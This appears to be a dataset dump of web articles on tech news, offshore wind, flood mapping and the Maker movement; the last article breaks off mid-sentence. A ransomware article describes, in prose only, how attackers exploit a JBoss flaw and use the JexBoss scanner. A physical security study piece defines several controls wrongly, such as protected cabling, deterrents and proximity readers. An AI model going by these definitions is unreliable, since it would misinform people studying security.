text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Intel Unveils 48-Core 'Cloud Computer' Chip - By Herb Torrens Intel pushed the outer limits of computing this week by unveiling a new experimental processor it described as a "single-chip cloud computer." The chip features 48-core processor technology developed by Intel's Tera-scale Computing Research Program. It was co-created by Intel labs in India, Germany and the United States. Intel hopes to engage researchers in the coming year by providing more than 100 of these experimental chips for R&D efforts. Those efforts will include developing new software and programming models based on the chip's technology. Microsoft is involved in the research, according to Dan Reed, corporate vice president of extreme computing at Microsoft. The company is exploring market opportunities in "intelligent resource management, system software design, programming models and tools, and future application scenarios," Reed said in a released statement. The chip's connection to cloud computing was rather vaguely expressed in Intel's announcement. Specifically, the announcement said that computers and networks can be integrated on a single piece of 45-nm, high-k metal-gate silicon, which has the footprint of a postage stamp. The smaller footprint may be useful for crowded datacenters. In addition, the chip may introduce new data input, processing and output possibilities. "Computers are very good at processing data, but it requires humans to input that data and then analyze it," said Shane Rau, a research director at analyst firm IDC. "Intel is looking to speed up the computer-to-human interaction by basically getting the human element out of the way." According to Intel, this kind of interaction could lead to the elimination of keyboards, mouse devices and even joysticks for computer gaming. Intel's announcement even suggested that future computers might be able to read brain waves, allowing users to control functions by simply thinking about them. In thinking about that, Rau said there's still room for slowed-down human processes. "This process needs to be thought out very carefully, and that's one area where the slow IO [input/output] of humans may be an advantage," he said. Intel developed the chip based on its "recognition, mining and synthesis" (RMS) approach, according Rau. "The technology announcement today is similar to Intel's announcement regarding an 80-core processor last year," Rau said in a telephone interview. "It's basically an effort known as RMS by Intel that puts silicon in the hands of the people and institutions that can create the building blocks for future computing devices and software." The chip is just designed for research efforts at the moment, according to an Intel spokesperson. "There are no product plans for this chip. We will never sell it so there won't be a price for it," the Intel spokesperson noted in an e-mail. "We will give about a hundred or more to industry partners like Microsoft and academia to help us research software development and learn on a real piece of hardware, [of] which nothing of its kind exists today." Herb Torrens is an award-winning freelance writer based in Southern California. He managed the MCSP program for a leading computer telephony integrator for more than five years and has worked with numerous solution providers including HP/Compaq, Nortel, and Microsoft in all forms of media.
<urn:uuid:63b4c7f8-4741-4b2a-91f5-c572a42a1176>
CC-MAIN-2017-09
https://mcpmag.com/articles/2009/12/04/intel-unveils-48-core-cloud-computer-chip.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00313-ip-10-171-10-108.ec2.internal.warc.gz
en
0.957206
688
2.609375
3
Overview of physical security and environmental controls Security is normally an area that is usually very broad based owing to the fact that there are many ways through which it can be implemented and enacted. One of the ways through which it can be enacted is through the development of security policies. Another aspect of security is the physical security. This is where security is implemented physically and through actions. Environmental control and especially in our working environments is also another aspect that should be taken with much affirmation since our places of work should also be environmental friendly. HVAC: In most data centres, this is an abbreviation that one will not miss and it stands for Heating, Ventilating and Air Conditioning. This is a system that plays a very important role in keeping the environment at a constant temperature. This is a very complex system that calls for high level engineering and science and one can barely design it by one's self. It is also important that the HVAC system is properly integrated into the fire system so that in case of a fire, the cooling system does not circulate oxygen to feed the fire. In terms of the Heating, Ventilating and Air Conditioning perspective, one's data centre should be separate from the rest of the building. With overheating being a huge issue in a data centre, one need to ensure that such temperature changes to not affect the whole building but only the data centre section. There are also other systems known as closed-loop systems and positive pressurization. In the closed-loop, the air in one's building is in constant recirculation hence no air from outside is pulled in to cool the building. The positive pressurization means that when one open the door, air inside the building will rush out automatically especially in cases of a fire and one want to get rid of the smoke. Fire suppression: When working in an environment where there are many computers and power systems, it is evident and vivid that water must not be of any close proximity. This means that in such an environment, one should have very little fire suppression systems that rely on water. Fire detections is also very important since it provides a good basis of the probable cause hence making it easier for one to supress it. One should make sure that one has smoke, fire and heat detectors installed in one's data centre. When one is planning to take care of a fire with water, there are different methods that one can use. One is the dry pipe method where the pipe that has one's water is completely dry and in case of fire detection, the pipe fills up with water to the appropriate pressure and puts out the fire. The wet pipe method is one where one can immediately discharge the water in case of a fire alarm. There is also the preaction suppression method where the pipe where the pipe is filled with water and has the appropriate pressure but won't turn on until the temperature hits a certain amount making this system to go into effect. Fire suppression can also be done with the use of chemical that are environmental friendly. This means that there are many fire suppression options apart from water. EMI shielding: Electromagnetic interference is a common problem that occurs when we put many computers very close to each other. For instance, if one places a radio near a computer, one may realize that there is some electromagnetic interference radiating through the heat sinks, circuit boards and cables among other interfaces that are directly in the computer. If one open up a computer, one realize that there is a lot of metal shielding that may be on the case itself or either wrapped around the computer itself so as to prevent some of the electromagnetic interference from getting into one's environments. The metal shielding should not be removed at all costs since it prevents the radiated signals from getting into other components and devices that could be in one's environment. Hot and cold aisles: When talking about hot and cold aisles, we generally refer to the manner in which our data centres are engineered; that is in which rack and what directions we put our servers. For instance, if one look at one's data centre, one may see servers arranged in different racks and on with raised floors underneath. It is underneath the raised floors that we have cold air moving in and blowing up into openings in the floor. Through this, the cold air is pulled into the racks of the servers by the fans and pushes it through the system. There is also the back of the server where all the hot air from the server is coming out, moving to the top of the building and then pulled below by the air conditioning systems where it is cooled. When designing this for maximum optimization, we should have cold aisles where all the cool air is being pulled through and hot aisles where the hot air from the computer systems can be sent to the top of the building for recirculation. Environmental monitoring: After all environmental control systems have been set up such as cold and warm isles; it new becomes our responsibility to make sure that we establish whether our installation is having the actual effect on the temperature. So as to know if there is any effect occurring, we have to monitor the temperature over a period of time so as to make sure that whatever we are cooling is working properly and functional. For instance, one should ensure that if one increases the temperature, it will not result into an increase in the costs one incurs. In most cases, one only turn on and off the cooling systems without necessarily keeps track of any changes. In this case, it is important that one obtain a thermometer that one can constantly watch and monitor. In addition, one can use it to keep track of information such as humidity and daily temperature changes. With the help of such a thermometer, one should witness different temperature patterns for the different time intervals. One may also find out that different periods of the month have different temperature recordings which could depend on the level of CPU utilization. A higher CPU utilizations means more heat generated. With these logs available, one might later look into them and make some analysis on the working of one's cooling system for instance determine if there is proper amount of humidity in one's environment. Another aspect of environmental monitoring can be video monitoring. In this case, one might decide to have one's own closed-circuit television which is an in-house component one can use to capture videos and data from one's cameras. With such video devices, one can protect one's assets. This is a common feature in shopping malls and supermarkets. When setting up such cameras, one should take into account their location. One can decide to locate them inside one's building to monitor one's assets and also outside so as to monitor people in the parking lot. One should also consider the size of the area to monitor since there are cameras that offer a large field of view while others offer a small field of view. One should also consider the lighting of the place to monitor. If the area has less lighting, one might want to install special type of cameras that can monitor even with a low lighting system such as during the night. One should also make sure that one's video monitoring system has a proper integration with other security monitoring systems and devices so as to make sure that one's video system works properly with other intrusion systems for proper capturing of information. Temperature and humidity controls: Temperature in a data centre can be quite a challenge. This is in that when one's systems get too hot they might crash, and when they get too cold, then one might waste a lot of money with one's cooling system. Most of the data centres are normally very cold contrary to a Google recommendation to have an 80 degrees measure in the cold aisle which will optimally work for all one's systems. Humidity on the other hand refers to the amount of moisture in the atmosphere. Too much moisture in the air could lead to corrosion of one's systems and therefore having cooling systems helps in removal of such moisture. If the humidity is too low, one might experience some static discharge which can be dangerous to one's computers and other sensitive electronic components. Hardware locks: Hardware locks are among the most common physical security components. These are devices that are present on all doors. In most cases, this physical security aspect uses the whole and key mechanism where a key is required to open up the lock. However, in other cases, a key may not be necessary. Mantraps: Mantraps are other special security enforcement methods. These systems are designed to detect illegal access of an area and they automatically initiate a lock of all the entrances so that the trespasser does not leave the room and hence some sort of trap is developed. Video Surveillance: Video surveillance is an aspect of physical security where surveillance cameras are installed in various places either inside or outside a building. With these cameras, all activities happening are captured and displayed on a special type of screen for supervision. Video surveillance is considered very effective since it provides all- time security surveillance either during the day or at night. One disadvantage is that this form of security relies on the presence of power and hence a power outage can lead to loss of the surveillance. Fencing: Fencing is another form of physical security. This involves having a perimeter barrier erected around an organization or company. Through this, unauthorized entry of people and animals is limited. This means that an individual seeking access to the area that has been fenced can only use the authorized entry point which in most cases is usually the gate. Proximity readers: Proximity readers are some special type of devices that are able to establish the distance an individual is from a restricted area. With such readers, an approaching individual is detected and all his or her activities can be monitored. Once the individual gets to the restricted area, the readers can raise an alarm so as to draw the attention of security personnel. Access list: An access list is a manner in which security is enforced inside organizations. In this case, there are usually special lists that are compiled giving a clear outline of the people who should access a particular facility or section in the organization. For instance, one can have an access list at the entry point of a server room so as to ensure that only the permitted database administrators can gain access to it. Proper lighting: Proper lighting is also another way of enhancing security. This mainly applies in open places such as streets where many people carry out their daily activities. With proper lighting, all activities can be monitored for security purposes. Signs: Signs can also be used as a physical means of enforcing security. In most cases, the signs normally appear in the form of warnings. For instance one can have a sign prohibiting the access of a particular section of an organization. Such signs are normally very distinct and can be seen from a distance. Guards: Guards are individuals employed to man a particular area. These are individuals entitled with the responsibility of making sure that there proper security. They are people who can be stationed at different places such as gates, door entrances and exits. Apart from monitoring activities happening, the also carry out inspection on people and vehicles getting in and out of any premises. Barricades: Barricades are barriers that inhibit the accessibility of a particular area to people or vehicles. In other cases, they can be used to bring permanent closure to a particular entrance. Biometrics: Biometrics is among the latest technology to enforce security. These are devices that are made to recognize a finger print, the eye or even make some facial recognition so as to allow one to gain access to a particular area. They are usually installed on doorways. They are fed with information of only those people allowed to access the building. Protected distribution (cabling): Cabling is another aspect of security enhancement. In most cases, most of the cables normally carry some electric power hence making them ideal for an electric fence. The cables are always live and therefore an attempt to penetrate through them can lead to electrocution. Alarms: Alarms are special sound systems that are used to create the attention of security personnel in case of a security breach. Alarms can either be automated while others are manual and only ring when powered on. Motion detection: Motion detectors are highly sensitive devices that have a very high capability of detecting the slightest motion in a building. Such devices are usually installed in places where access is completely restricted such as bank safes. Deterrent: This is a security control measure where there access to an area is false fully restricted. This means that access cannot be obtained at all costs. Preventive: Preventive control is a method where all the necessary security measures are taken in advance so as to avoid an instance where an individual can gain access to a building without the awareness of security personnel. Detective: Detective control is where all the security personnel in an organization rely on security intelligence through carrying out various investigations and research. Compensating: Compensating control comes in where a particular organization decides to utilize a particular security enforcement strategy that can cover up for many other security enforcement practises. In this case, one can use an alarm system that can be used in case of a fire, security breach among other reasons to call for alarm. This means that many security issues can be handled using the same device. Technical: Technical control entails carrying out some security analysis so as to have an effective security system. This means that there has to be well calculated time intervals between security switches so as to ensure that security is still in force even with the absence of security personnel. Administrative: Administrative control is where a specific individual is allocated a specific security area to handle and manage. The different security sections in an organization are managed by different people hence bringing some order in the execution of security policies. Basically, a well dynamic and vibrant security system is crucial for top protection of every aspect in an organization. It is for this reason that security must be given an upper hand in terms of seniority and also funding. On the other hand, the environment in which many machines are operated should also be one that is ideal and provides all the conditions for efficient running of the machines.
<urn:uuid:23770999-9dfd-40dd-a93f-30bbbdbc1228>
CC-MAIN-2017-09
https://www.examcollection.com/certification-training/security-plus-overview-of-physical-security-and-environmental-controls.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00313-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958058
2,880
2.78125
3
World War II tech re-enlists as a smart antenna Wireless networks have revolutionized mobile computing, but they have faced two major challenges, especially when deployed outdoors: providing coverage where needed and security. Some are now betting that an older technology that was first applied to radar can make secure wireless coverage in the field more efficient, secure and, yes, more affordable. That technology is beamsteering, which uses phased arrays of antennas to shape electromagnetic wave patterns to direct them toward a specified target. "Phased arrays in general have been around for more than 50 years," said Joe Carey, CEO of Fidelity Comtech, a wireless communications company based in Longmont, Colo. "They were developed initially in World War II, and they've been used predominantly for radar applications and in electronic warfare. What we're doing is we're taking that technology and commercializing it for wireless data networks." Ironically, the growth of wireless communications is itself presenting additional challenges that beamsteering – and Fidelity Comtech's Phocus Array product – has the potential to overcome. In wireless, the advent of smartphones is causing more and more congestion of spectrum," said Carey. Phocus Array allows us to “contour the beam” so that we get coverage where we need it without causing undue interference to adjacent cells. “And we’re also not subjected to undue interference from adjacent cells," he added The 802.11b/g Phocus Array is an eight-element, circular, phased-array antenna capable of providing dynamic antenna patterns – ranging from a 360-degree omnidirectional pattern to a longer-reaching 43-degree pattern. The pattern can be changed on the fly – in fact, in under 100 microseconds – to focus on particular clients or to avoid interference. Currently, Carey said, the company’s main market is shipping container yards at ports. “We see it having the most value outdoors, because in the outdoor environment you have a really high cost of siting an installation,” he said. “Obviously putting a smart antenna in an access point or base station increases cost … [but] in an outdoor area, the cost of siting a radio can often far exceed the cost of the radio itself. That's when it makes more sense to invest in a smart antenna.” As the equipment is getting more accurate and less expensive, Carey said he sees potential for other markets. “We see this having a lot of applicability in real-time location services – being able to track mobile users and, say, unmanned aerial vehicles,” Carey said. What’s needed to gain accuracy and lower costs? Apart from refining algorithms, the key ingredient in improving phased-array wireless, Carey said, is better semiconductors to run those algorithms on. “There's an awful lot of computation that goes into these systems,” Carey said, noting that the company is currently using its third generation of calibration algorithms. Specifically, the smart antennas need to compensate for imperfections in the circuit cards of the equipment as well as for noise in the external environment. “Figuring out how to build these custom antenna patterns took us years,” Carey added. “I was a bit naïve when I started this. One of the things we have struggled with and now we think we have nailed is the interaction between the antenna and the medium access control layer – the interaction between the radio protocol and the way the antenna should behave. It's really complicated. And most of the protocols were not written with the concept of the spherical antenna in mind.” Fidelity Comtech is also working on a project with the Department of Defense to use the beamsteering capabilities of phased arrays to develop an anti-jam antenna. “If the enemy is trying to jam you, you can put a null on the jammer,” Carey said. “It's a special kind of beamsteering. We can point the beam at the intended receiver and we can form a null simultaneously on the jammer.” A nulling system measures the amplitude and phase of a signal and generates a counteracting signal that blocks the interference. The same technologies can potentially be used to reduce or eliminate unintentional interference. “Anyone who has deployed a large wireless data network will tell you that they often don't know when they are getting accidental jamming or intentional jamming,” Carey said. “They just know that their network is not working and they have no idea why. We help them with that.” Posted by Patrick Marshall on Feb 25, 2014 at 12:32 PM
<urn:uuid:c6f5c3e1-a0fc-415d-9a94-069f47f9fa43>
CC-MAIN-2017-09
https://gcn.com/blogs/emerging-tech/2014/02/beamsteering.aspx?admgarea=TC_Mobile
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00489-ip-10-171-10-108.ec2.internal.warc.gz
en
0.959297
955
2.8125
3
The US government today took a bold step toward perhaps finally getting some offshore wind energy development going with $50 million in investment money and promise of renewed effort to develop the energy source. The Department of the Interior and Department of Energy have teamed on what they call the joint National Offshore Wind Strategy: Creating an Offshore Wind Industry in the United States. The plan focuses on overcoming three key challenges that have made offshore wind energy practically non-existent in the US: the relatively high cost of offshore wind energy; technical challenges surrounding installation, operations, and grid interconnection; and the lack of site data and experience with project permitting processes. Layer 8 Extra: 10 hot energy projects that could electrify the world In support of this the plan the DOE announced three projects that will be funded up to $50.5 million over 5 years to develop breakthrough offshore wind energy technology and to reduce specific market barriers to its deployment: - Technology Development (up to $25 million over 5 years): DOE will support the development of innovative wind turbine design tools and hardware to provide the foundation for a cost-competitive and world-class offshore wind industry in the United States. Specific activities will include the development of open-source computational tools, system-optimized offshore wind plant concept studies, and coupled turbine rotor and control systems to optimize next-generation offshore wind systems. - Removing Market Barriers (up to $18 million over 3 years): DOE will support baseline studies and targeted environmental research to characterize key industry sectors and factors limiting the deployment of offshore wind. Specific activities will include offshore wind market and economic analysis; environmental risk reduction; manufacturing and supply chain development; transmission planning and interconnection strategies; optimized infrastructure and operations; and wind resource characterization. - Next-Generation Drivetrain (up to $7.5 million over 3 years): DOE will fund the development and refinement of next-generation designs for wind turbine drivetrains, a core technology required for cost-effective offshore wind power. Meanwhile, the DOI said it would identified four Wind Energy Areas offshore that uses appropriate designated areas, coordinated environmental studies, large-scale planning and expedited approval processes to speed offshore wind energy development. The areas, on the Outer Continental Shelf offshore Delaware (122 square nautical miles), Maryland, New Jersey, and Virginia, will receive early environmental reviews that will help to lessen the time required for review, leasing and approval of offshore wind turbine facilities. The department said that by March it expects to identify Wind Energy Areas off of North Atlantic states, including Massachusetts and Rhode Island, and launch additional NEPA environmental reviews for those areas. A similar process will occur for South Atlantic region, namely North Carolina, this spring, the agency stated. Under the National Offshore Wind Strategy, the Department of Energy is pursuing a scenario that includes deployment of deploying 10 gigawatts of offshore wind generating capacity by 2020 and 54 gigawatts by 2030. In a report last fall, the DOE said that if wind is ever to be a significant part of the energy equation in this country we'll need to take it offshore - into the deep oceans. Large offshore wind objects could harness about more than 4,000 GW of electricity according to the DOE. The DOE noted that while the United States has not built any offshore wind projects about 20 projects representing more than 2,000 MW of capacity are in the planning and permitting process. Most of these activities are in the Northeast and Mid-Atlantic regions, although projects are being considered along the Great Lakes, the Gulf of Mexico, and the Pacific Coast. The deep waters off the West Coast, however, pose a technology challenge for the near term. "Although Europe now has a decade of experience with offshore wind projects in shallow water, the technology essentially evolved from land-based wind energy systems. Significant opportunities remain for tailoring the technology to better address key differences in the offshore environment. These opportunities are multiplied when deepwater floating system technology is considered, which is now in the very early stages of development," the report states. Last year Google said it wants a big part of the energy that could be generated from offshore wind farms. The company said it inked "an agreement to invest in the development of a backbone transmission project off the Mid-Atlantic coast that offers a solid financial return while helping to accelerate offshore wind development-so it's both good business and good for the environment. The new project can enable the creation of thousands of jobs, improve consumer access to clean energy sources and increase the reliability of the Mid-Atlantic region's existing power grid." The project, known as the Atlantic Wind Connection (AWC) backbone will be built across 350 miles of ocean from New Jersey to Virginia and will be able to connect 6,000MW of offshore wind turbines. That's equivalent to 60% of the wind energy that was installed in the entire country last year and enough to serve approximately 1.9 million households, Google stated. "The AWC backbone will be built around offshore power hubs that will collect the power from multiple offshore wind farms and deliver it efficiently via sub-sea cables to the strongest, highest capacity parts of the land-based transmission system. This system will act as a superhighway for clean energy. By putting strong, secure transmission in place, the project removes a major barrier to scaling up offshore wind, an industry that despite its potential, only had its first federal lease signed last week and still has no operating projects in the U.S.," Google stated. Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
<urn:uuid:4f0e7ee7-7c69-465f-95bf-e6f8b0288df7>
CC-MAIN-2017-09
http://www.networkworld.com/article/2228458/security/us-tries-to-fire-up-mighty-offshore-wind-energy-projects.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171171.24/warc/CC-MAIN-20170219104611-00013-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938149
1,132
2.609375
3
SamSam (aka Samas or SamSa) is a newer variant of ransomware that is taking on a different approach to targeting and infecting unsuspecting users. SamSam is spreading through compromised Web Servers – many Schools and Healthcare industries that may not be able to afford a decent IT staff to stay up to date on the latest patches. Ransomware in The Beginning Ransomware is nothing new to security researchers. Traditionally, ransomware infections originated as targeted spam emails, then transformed into a fake Antivirus or some self proclaimed ‘cleaner’ that would slam you with alerts and prompt the user to make a payment to remove some sort of infection that more than likely didn’t exist to begin with. The traditional ransomware tricked a user into visiting a domain under the attackers control where drive-by downloads took place or used malicious attachments that when opened installed one or more variants of malware onto the target’s system. This malware eventually included some sort of ransomware variant like Locky, Cryptowall, TeslaCrypt, etc. The threat is still growing, ransomware has gotten much more effective and scarier. Variants such as CryptoLocker, which when activated on the target, encrypts files stored on local and mounted drives using RSA public key encryption rendering the system useless. CryptoWall, which is an even more destructive piece of malware. CryptoWall uses symmetric encryption, meaning there is no key to be retrieved forensically leaving the victim no choice but to pay cybercriminals money to retrieve their data. How much money? It is estimated that $325 million dollars was paid to cybercriminals by businesses and individuals in 2015 as a result of CryptoWall alone. New Ransomware on The Block The newer variant of ransomware, SamSam, is spreading through compromised Web Servers as a method of delivery or rather an entry point to gain a foothold in the network and spreading laterally stealing more credentials, and further infecting and encrypting more workstations and systems, holding them for ransom. SamSam is itself a compiled .NET binary whose original primary filename associated with the ransomware was samsam.exe, but has changed multiple times. Like other ransomware, SamSam encrypts files, steals credentials, and locks users out of their systems until a ransom is paid. The cyber attackers spreading SamSam have been utilizing an old vulnerability (CVE-2010-0738 reported by Marc Schoenefeld) to gain entry to certain networks. CVE-2010-0738 is basically a server misconfiguration that only enforces session protection of the application when it comes to GET and POST Request methods only. Therefore, CVE-2010-0738 essentially allows unauthenticated users to upload malicious WAR files using other HTTP methods, mainly HEAD requests. Cybercriminals have also been using the open source tool JexBoss to scan the web for vulnerable servers, basically scanning servers for a few known web paths that will allow the attacker to gain unauthenticated Remote Code execution on JBoss 4, 5, and 6. It was newly discovered that there are more than 3.2 million systems running vulnerable versions of JBoss. Recently there has been numerous reports of infections from schools and healthcare organizations that are being asked to pay up to $20,000 in ransom due to JBoss. The FBI considers JBoss to be a big threat. A ransomware threat is as real as it gets, but paying shouldn’t be an option, as paying the ransom does not guarantee that victims regain access to their locked files. Overall, SamSam and JBoss has been a serious threat that has stayed under the radar until lately. While the malware itself is not terribly sophisticated, the tactics used by the attackers make them both a serious threat.
<urn:uuid:1036c4b3-ccf3-4427-9e15-d6a390dc35c7>
CC-MAIN-2017-09
https://www.alertlogic.com/blog/jboss-and-samsam/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00361-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945281
765
2.796875
3
For people whose business is to worry about flooding, there's no debate the Federal Emergency Management Agency (FEMA) needs to keep its flood maps current. But as Congress discusses the future of the National Flood Insurance Program (NFIP), not everyone agrees on the best way to modernize those maps or pay for the effort. Congress created the NFIP in 1968 to reduce disaster assistance costs after floods by providing insurance on properties that are at high risk of flooding, so fewer owners will need government aid. The program also helps state and local governments manage floodplains so fewer properties are constructed in the way of rising waters. To support those two goals, FEMA works with state and local governments across the U.S. to map floodplains. FEMA's Floodplain Insurance Rate Maps (FIRMs) indicate Special Flood Hazard Areas (SFHAs) - terrain where, in any given year, the chance that a stream will inundate the land is 1 percent or more. Anyone seeking a federally insured mortgage on a property in an SFHA must have flood insurance, which the NFIP subsidizes. Insurance agents and lenders use FIRMs to determine which properties require the insurance. State and local governments use them in development planning and flood mitigation programs. Unfortunately in a community with ongoing development, the job of mapping the floodplain is never done. "As farm fields and forests are turned into rooftops and parking lots, it destroys trees," said Larry Larson, executive director of the Association of State Floodplain Managers (ASFM) in Madison, Wis., adding that with fewer roots to drink up the water, more water runs into the nearest stream. "The flood level of that stream may go up significantly. As it does, the boundary of the 100-year floodplain expands to embrace more properties." Homeowners continuously complain that their maps are obsolete, said David Maune, senior project manager for remote sensing at Dewberry, a Fairfax, Va. planning, design and program management firm whose expertise includes geographic information. "I think something like 25 to 30 percent of flood claims are from people outside the special flood hazard areas," Maune added. This creates a problem because many of these people don't carry flood insurance since, according to the FIRMs, they don't need it. Funding Running Out For a long time, FEMA had only $50 million per year to produce and update flood maps, Larson said. In 2003, Congress boosted that budget to $200 million a year, but only for the five-year period ending in 2008. "Unless some additional authorization and appropriation is provided, FEMA will drop back to that $50 million a year," Larson cautioned, "and once again our maps will quickly become outdated." A bill introduced in the U.S. House of Representatives in March proposed raising that funding to $400 million per year for fiscal 2008 through 2013. The Flood Insurance Reform and Modernization Act of 2007 directs FEMA to establish an ongoing program to review, update and maintain the FIRMs. Among other items, it also requires FEMA to raise the NFIP's insurance coverage limits; phase out insurance subsidies for vacation homes, second homes and nonresidential properties; and submit annual financial reports on the NFIP. Although FEMA ultimately is responsible for keeping flood maps current, state and local governments, working with private-sector partners, do the bulk of the work and share the costs with the federal government, Larson said. When engineers study updating the FIRMs, hydrology and hydraulics receive significant attention. The first asks, "If X inches of rain fall, what volume of water will that add to the local stream?" The second asks, "When you add that volume of water, how high will the stream rise?" A third factor is land elevation, or topography. Topography matters because, for example, if a house stands atop a knoll that puts it 10 feet higher than the surrounding land, it's less likely to flood than another house the same distance from the river on lower ground. During hearings before the House Financial Services Subcommittee in June, Maune testified that as FEMA updates the FIRMs, it should include elevation data collected using the latest geospatial technologies. Maune spoke on behalf of MAPPS (originally called the Management Association for Private Photogrammetric Surveyors), an association of private firms that provides spatial data and GISs. These firms provide technology and services to governments when they update their flood maps. In particular, MAPPS favors using light detection and ranging (lidar) technology to collect new topographic data. In a lidar system, sensors installed on a plane emit 150,000 pulses of laser light per second, scanning the terrain below to collect elevation data. Software then eliminates readings obtained from foliage and structures to calculate the elevation of the bare ground. Efficient and Accurate The most accurate way to collect elevation data is on the ground, using traditional surveying techniques, said John Dorman, director of the North Carolina Floodplain Mapping program. Still, he said, lidar can cover a great deal more ground at a lower cost, and it's much more accurate than the method the U.S. Geological Survey (USGS) used to collect much of the topographic data used in today's FIRMs. That's why the Floodplain Mapping Program used lidar to collect elevation data for all of North Carolina. "We have accuracy that people really can't beat," Dorman said. "It feeds really well into the engineering model." North Carolina funded the collection of elevation data with $5 million from the Innovative Partnerships program at USGS and completed the work in 2005. Some elevation data used in today's FIRMs dates from the 1970s, when the USGS used photogrammetric technology, Maune said. Lidar offers the ability to represent changes in elevation much more precisely, he said. Precision is especially important in very flat terrain such as coastal Florida, where a half-foot of elevation could mean the difference between hurricane-related flooding staying near shore or rushing far inland. Though Larson agrees that collecting more accurate elevation data is a good idea, he doesn't share Maune's sense of urgency on the issue. "New topo, better topo, is always useful," he said, "although there are many, many areas of the country where good topo, beyond the national minimums, already exists." In some communities, new topographic data would provide better maps, Larson said. "The engineering wouldn't be any better, but it makes the depiction better." For ASFM, the big concern is that money for acquiring new elevation data should not come from FEMA's mapping program budget. "There simply isn't enough there," Larson said. Along with North Carolina, several other states have raised their own funds to acquire new topographic data using lidar. But all states and local communities, and many other federal agencies besides FEMA, need this data for a variety of purposes. "I believe that there needs to be federal funding, either through FEMA or through USGS, that allows states to partner and share the costs, but also share the benefit of the data," Dorman said. "I don't think the federal government has its ducks in a row now, but that's the approach that needs to be taken." "Nobody is arguing that FEMA ought to solve what is basically a nationwide problem," Maune said. "It's something that OMB [Office of Management and Budget] is going to have to work out with a lot of different appropriations." Bio: Contributing Writer Merrill Douglas is based in upstate New York. She specializes in applications of information technology.
<urn:uuid:486c6518-7379-46b5-b111-904fc3520cc4>
CC-MAIN-2017-09
http://www.govtech.com/public-safety/Rising-to-the-Challenge.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00061-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945314
1,584
2.734375
3
Apple has designed a special robot that can disassemble old iPhones when they're returned to the company for recycling. The robotic tool, which Apple calls Liam, separates the iPhone into its components and then removes valuable materials so they can be reused in other products. Some of the materials extracted include cobalt and lithium from the battery, gold and copper from the camera, and silver and platinum from the motherboard. The silver can be reused in solar panels, Apple says, and tungsten can be used to make precision tools. "There's no other machine in the world that can do what Liam can do," Lisa Jackson, Apple's vice president of Environment, Policy and Social Initiatives, said at a press event in Silicon Valley on Monday, where Apple also announced new models of the iPhone and iPad Pro. Liam is still an R&D project, she said. It was developed as part of Apple's larger efforts to be more environmentally friendly. Apple has already been focused on using renewable energy, and now Liam could put more recycled materials back into the global supply chain. It's also a good way for Apple to save money, because it doesn't need to buy as much of those expensive materials again. In a way, Liam is a mechanized substitute for the recycling professionals who scrape off gold and other precious metals from discarded products. The Liam tool could be used on iPhones that have been returned to Apple for recycling.
<urn:uuid:36114f8a-d1ae-434a-88e2-f49913bcb14b>
CC-MAIN-2017-09
http://www.itnews.com/article/3046191/apples-liam-is-a-robot-that-takes-apart-your-iphone-for-recycling.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00533-ip-10-171-10-108.ec2.internal.warc.gz
en
0.961116
293
3.15625
3
Before the Revolutionary War, sheets of tin imported from England were fashioned by people working at home into plates, cups and candle holders. They shared production techniques with one another and collectively produced enough products to give rise to a distribution system known as Yankee Peddlers. Today, the raw tools of individual production are sensors, circuit boards, 3D printers, open-source development platforms and cloud services. Kickstarter, not horseback peddlers, is providing the initial capital. In time, the tin-making business created a foundation for hardware manufacturing. Idea generation was infectious as production capabilities improved and new companies were rapidly formed. The Silicon Valley of this industrial age was the Northeast. In one city -- New Britain, Conn. -- a patent expert, James Shepard, determined that by 1899 this city was at "the head of the inventive world" in patents issued per capita. That was 115 years ago. But something similar is under way today. In San Francisco, Jason Aramburu is running a Kickstarter campaign for his product, the Edyn smart garden system. It has raised $262,000 so far. How he produced this system offers a roadmap to a new industrial age that will rely heavily on Internet of Things technologies, the cloud and low-cost design and fabrication tools. In the United Kingdom, there's Samuel Cox. He assembled a microprocessor, accelerometer, ultrasonic sensors, rechargeable battery, cellular GSM and GPS into a floating shell that he built himself. A prototype of the device, called the Flood Beacon, cost about $700 to make and be can positioned to measure water depth. It was designed to help keep track flood waters in real time. Aramburu and Cox each taught themselves how to build these systems, and what they are doing represents a broader trend that is getting White House attention. The so-called Maker Movement, enabled by design software, desktop machine tools, laser cutters and 3D printers, is "enabling more Americans to design and build almost anything," and "represents a huge opportunity for the United States," said the White House in a statement at the start of demonstrations this week of the technologies. Quantifying the size of this opportunity is difficult, but much of the development uses Internet of Things technologies, a market that Gartner estimates may deliver $1.9 trillion by 2020 in global economic value. This market is made possible by rapidly falling prices, accessible tools,and cloud services that process the information gathered by these physical devices. Aramburu studied ecology and environmental science, specifically, soil science, at Princeton and later in a Smithsonian research project. His first idea for business was a sustainable fertilizer funded with the help of a grant from the Bill and Melinda Gates Foundation. In working with fertilizers, researchers needed a way to identify the fertilizer's impact. Soil conducts electricity and by measuring what's going on it can tell a lot about soil conditions. Aramburu realized the opportunity. He started picking up the skills he needed to build a tool for measuring soil conditions, and tapped the expertise of friends. One tool was Arduino, an electronics development platform, which Aramburu said was easy to learn. He got a membership at TechShop, a kind of hacker space for people who want to make things, and took classes in laser cutting and 3D printing. They used a MakerBot Replicator, a desktop 3D printer, to cut some of the initial cases for the product. They also used another prototyping platform, Electric Imp, for the connectivity 